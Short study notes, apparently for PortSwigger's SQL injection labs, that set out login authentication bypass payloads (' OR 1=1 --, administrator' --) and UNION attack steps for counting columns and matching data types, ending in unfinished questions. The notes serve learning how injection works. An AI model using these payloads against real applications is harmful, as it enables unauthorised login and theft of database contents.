PSG SQL
Basic SQL Login Auth bypass
Note: If inside Burp Repeater, remember to press CTRL + U to format the payload
' order by 1 --
will become
'+order+by+1+--
Vuln code
`SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'`
Crafting
SELECT * FROM users WHERE username = 'administrator' --' AND password = 'bluecheese'
SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'bluecheese'
Exploit Delivery
administrator' --
' OR 1=1 --
Types of SQL injection

In-band SQLi: you get the response, aka normal SQLi
Inferential SQLi: you don't get the response, aka blind SQLi
Out-of-band SQLi: you use a server as a man in the middle to send the response back to you
UNION attack to retrieve data from other tables
Vuln code
select * from categoryTable where category='Corporate Gifts'
Determine number of columns
' order by 1 --
' order by 2 --
Combine order by with select query
select * from categoryTable where category='' order by 1 --anything here gets ignored
UNION SELECT can be used to double-check the number of columns
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
Ensure same Data type
'a' , 'a'
123 , 'a123'
characters?
alphanumeric?
numbers?